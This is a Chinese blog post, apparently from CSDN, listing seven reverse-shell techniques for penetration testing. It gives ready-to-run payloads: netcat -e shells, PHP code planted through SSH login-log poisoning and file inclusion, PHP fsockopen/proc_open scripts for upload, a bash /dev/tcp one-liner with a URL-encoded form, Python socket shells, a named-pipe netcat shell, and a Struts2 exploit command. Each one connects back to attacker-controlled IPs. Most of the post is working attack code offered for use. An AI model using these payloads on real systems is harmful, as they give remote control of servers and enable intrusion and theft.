反shell方法

已于 2023-11-02 22:47:50 修改
阅读量212 收藏
点赞数
分类专栏: shell 渗透 文章标签: 反shell 渗透
于 2023-11-02 17:50:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_70137901/article/details/134188055
版权

反shell方法

shell 开启回显 python -c “import pty;pty.spawn(‘/bin/bash’)”

方法一 利用nc完成反shell 适用webshell

适用于对方网页有webshell

  1. kali先开启nc端口监听

    nc -lvvp 监听端口

  2. 让对方电脑里的nc一启动就自动连接

    /bin/nc -e /bin/bash 自己ip 监听的端口号

方法二 php利用登录日志植入反shell脚本 适用对方html语句有函数调用

  1. F12查看是否有函数调用或者收集信息找到对方的用户名在url框php后门输入?+猜想的用户名=命令或文件+挨个试如果

    如果元素页显示就说明有这个功能
    在这里插入图片描述

  2. 使用var/log/auth.log查看日志

  3. 存在登录日志就在kali里执行ssh远程登录脚本

    ssh '<?php system($_GET['用户名']);? >'@对方IP -p 对方ssh端口号

  4. kali开启nc监听nc -lvvp 端口号

  5. 在url里输入

    (http://10.9.47.172(对方ip)/info.php?zc=/var/log/auth.log&xl(调用我方植入的函数)=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.9.47.187",10002));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);')

  6. 就可以反shell

方法三 网页后台有php源码利用php反shell脚本

<?php $ip='10.9.47.187'; $port=10002; $sock = fsockopen($ip, $port); $descriptorspec = array( 0 => $sock, 1 => $sock, 2 => $sock ); $process = proc_open('/bin/sh', $descriptorspec, $pipes); proc_close($process); ?>

  1. 在网页的后台源码里放入这个脚本

  2. 在nc里开启脚本里的端口

  3. 在url框运行这个脚本

    such as :themes/default/filemanager/images/codiad/manifest/files/codiad/example/INF/在此路径下写入php脚本然后再搜索框里运行

方法四 php文件上传反shell

  1. 上传php反shell脚本
  <?php
   $ip='kali IP';
   $port=10002;
   $sock = fsockopen($ip, $port);
   $descriptorspec = array(
   0 => $sock,
   1 => $sock,
   2 => $sock
   );
   $process = proc_open('/bin/sh', $descriptorspec, $pipes);
   proc_close($process);>

上面不能用就用下面

   <?php
$sock = fsockopen("10.4.7.3", "10002");

$descriptorspec = array(

        0 => $sock,

        1 => $sock,

        2 => $sock

);

$process = proc_open('/bin/sh', $descriptorspec, $pipes);

proc_close($process);
?>

  1. 在源代码中找到这个脚本复制链接在浏览器里打开就会运行此代码,kali开启nc监听就可以

    在这里插入图片描述

方法五 最常用的bash -c 'bash -i >& /dev/tcp/VPS_IP/VPS_Port 0>&1'

这是最常用的反shell

这个是url编码后的

bash±c+%27bash±i+%3e%26+%2fdev%2ftcp%2f自己ip%2f监听端口+0%3e%261%27

配合nc一起用

方法六 python shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.182.36",10002));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.4.7.3",10002));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

方法七管道通信

先在tmp下创建一个管道文件

mknod /tmp/文件名 p

在用shell命令连接

/bin/sh 0</tmp/文件名 | nc ip port 1>/tmp/文件名

示例

python2 exploit.py "http://192.168.182.64:8080/struts2-showcase/showcase.action" "/bin/sh 0</tmp/gd | nc 192.168.182.36 10002 1>/tmp/gd"

http://192.168.182.64:8080/struts2-showcase/showcase.action" “/bin/sh 0</tmp/gd | nc 192.168.182.36 10002 1>/tmp/gd”`

抠脚大汉在网络
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
反编译自动化脚本-Linux
05-15
反编译自动化脚本-Linux
shell脚本加密
shao.bing的专栏
07-25 1712
如何保护自己编写的shell程序 要保护自己编写的shell脚本程序方法有很多,最简单的方法有两种:1、加密 2、设定过期时间,下面以shc工具为例说明: 一、下载安装shc工具 shc是一个加密shell脚本的工具.它的作用是把shell脚本转换为一个可执行的二进制文件.   # wget http://www.datsi.fi.upm.es/~frosal/sources/sh
Linux的Shell脚本加密
itas109的专栏
02-08 2072
Linux Shell脚本简单,易用,功能强大。但是,由于其基于类似文本的编写方式,导致其容易泄露敏感信息。因此,对于Shell脚本的加密也是一个重要的需求。 本文将介绍一款Shell加密工具Shc。它可以用来对shell脚本进行加密,可以将shell脚本转换为一个可执行的二进制文件。
shellcode反编译成c语言代码的两种方式
weixin_43090100的博客
10-04 5549
下述所用的工具包含:IDA pro,Dev C++ 以下介绍两种方法 开始操作之前,需要知道的几个小前提 一个可执行文件包含多个字段(field), text段是程序代码段,包含着要运行程序的指令。shellcode像你说的,转成汇编语言很容易,因为shellcode本质就是一段恶意的机器码——cpu指令 逆向工程(reverse engineering)常用到的分析工具大体有两个:olly...
Linux中将shell脚本打包为可执行文件
bingyu的博客
10-09 6182
Linux中将shell脚本打包为可执行文件 在实际运行中,将一个写好的脚本部署到生产系统上,但碍于保密或者密码泄露问题,需要将脚本打包封装。现在总结两种脚本打包方法,第二种shc实用性更加强。 1、gzexe加密 gzexe命令即可隐藏shell源码,这个命令是系统自带的gzexe程序。在运用中, gzexe script.sh会把原来没有加密的文件备份为 script.sh~ ,同时 script.sh 即被变成加密文件。 gzexe -d script.sh会解密还原脚本,所以只能够满足一般的加密
vxWorks shell调试方法.txt
09-01
vxWorks shell中常见的调试方法,包括断点使用、任务相关的调试命令、符号查找、汇编、内存查看和写入、信号量相关的调试命令等等。
shell实现四则运算简单方法
09-15
总的来说,Linux Shell提供了多种方式来进行四则运算,对于整数运算,`$(( ))` 是一种简便的方法,而处理浮点数时,`expr` 无法胜任,需要借助`bc`或`awk`这样的工具。理解这些运算机制对于编写高效、可靠的Shell...
shell中长命令的换行处理方法示例
09-14
总之,处理Shell中的长命令换行时,可以使用斜杠进行续行,并结合引号来添加注释。如果需要进一步提高代码组织性,可以考虑使用函数或别名,甚至编写脚本来封装命令。这些方法都可以有效地提高代码的可读性和...
Shell脚本注释写法
09-15
本篇文章将详细介绍三种在Shell脚本中添加注释的方法。 一、单行注释 在Shell脚本中,单行注释是最常见和简单的方式。只需在行首加入`#`字符,该行后面的所有内容都将被视为注释,不会被Shell解释器执行。例如: `...
Shell处理带空格的文件名的方法
09-15
Shell脚本编程中,处理带有空格的文件名是一个常见的挑战。由于Shell默认将空格作为参数分隔符,因此直接使用文件名时可能会导致意外的行为。以下是一些处理这种情况的方法和技巧。 1. **引用文件名**: 当...
懒人反编译辅助脚本工具
贺祥的博客-清风依然
11-09 9897
title: 懒人反编译辅助脚本工具 date: 2018-08-13 09:29:00 categories: Android tags: Java simplyDecompile 懒人反编译辅助脚本 一、利用本辅助工具编译 https://github.com/dz-hexiang/simplyDecompile 本工具是利用apktool 和dex2jar进行反编译的。只是简化了步骤。...
access控件无法被编辑_Access秘笈之反编译大法
weixin_39996096的博客
11-27 1305
本文讲解了如何解决使用Access开发的过程中,数据库文件的各种异常及损坏问题。望闻问切:了解并收集问题现象。大约是为了和 Office 其它组件统一,Access 有一个特色:它把所有对象和数据都放在同一个文件中。而不像其它开发工具,每个模块都是一个或多个文件。因此当我们使用 Access 进行开发时,不可避免会对同一数据库文件进行复修改。但修改的次数一多,就会出现各种奇奇怪怪的问题。比如下面...
shc gzexe 将shell脚本转换为二进制的可执行文件
weixin_34194702的博客
08-08 733
第一种方法(gzexe):这种加密方式不是非常保险的方法,但是能够满足一般的加密用途,可以隐蔽脚本中的密码等信息。它是使用系统自带的gzexe程序,它不但加密,同时压缩文件。使用方法:gzexefile.sh它会把原来没有加密的文件备份为file.sh~,同时file.sh即被变成加密文件;第二种方法(shc):使用shc对Linuxshell脚本加密.s...
Lua脚本反编译入门之一
热门推荐
IT梦
08-04 1万+
随着越来越多的游戏,软件采用Lua来实现业务逻辑, 想搞黑产的同学,时常便会遇见lua脚本,可惜大部分都是编译过的lua脚本,而且还是自定义的。 便难倒了很多菜鸟,lua 的实现机制,那可是虚拟机技术,非常难于调试。 本教程,便来普及lua 的虚拟机指令及其反编译lua脚本,成为文本形式的脚本 1.Lua的虚拟机指令,5.2 的有40条 Lua的指令使用一个32bit的unsig
shc/unshc工具用于加/解密shell脚本
草莓甜甜圈的博客
01-24 9742
一、shc加密文件 Shc可以用来对shell脚本进行加密,可以将shell脚本转换为一个可执行的二进制文件。经过shc对shell脚本进行加密后,会同时生成两种个新的文件,一个是加密后的可执行的二进制文件(文件名以.x结束),另一个是C语言的原文件(文件名以.x.c结束)。 下面就说明一下shc的安装,参数,以及使用示例: (官网下载地址: http://www.datsi.fi.upm.e...
反编译apk linux mac 反编译自动化脚本
jyygn163的专栏
05-12 991
步骤1. 软件安装大体流程: 1.下载apktool(反编译资源文件)、dex2jar(dex转jar)、jdgui(查看class文件)   注:我已上传到了附件里 2.将shell脚本”apktool”和”apktool.jar”放到 “/usr/local/bin”目录下  3.增加这两个文件可执行权限,chmod a+x file 执行shell apktool就ok了,安装
shell脚本汇编取出所有aesenc的函数名
Justine_King的专栏
05-23 621
首先说明下我要做的事,其实这篇是接上一篇接下去做的,test2中包含所有符合条件的文件路径,我需要将文件汇编取出所有AESENC的函数名 #!/bin/sh cat test2 | while read line do objdump -d $line | grep "\" | grep -v ">:" >> test5 done cat test5 | awk -F ':' '{pri
apktool反编译脚本 和反编译工具
445822357
08-02 179
===================脚本 apktool d -s -f D:\decompile\DbankAndroid_2.0.3.9_206666.apk D:\decompile\source pause cd /d D:\ImportantSoftware\dex2jar-0.0.7.4-SNAPSHOT pause dex2jar.bat D:\decomp...
建立shell脚本的方法
最新发布
06-28
建立shell脚本的方法: 1. 打开终端或命令行界面。 2. 使用文本编辑器(如vi、nano、gedit等)创建一个新文件。 3. 在文件的第一行添加#!/bin/bash,这是告诉系统这个文件是一个bash脚本。 4. 编写脚本代码,可以...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值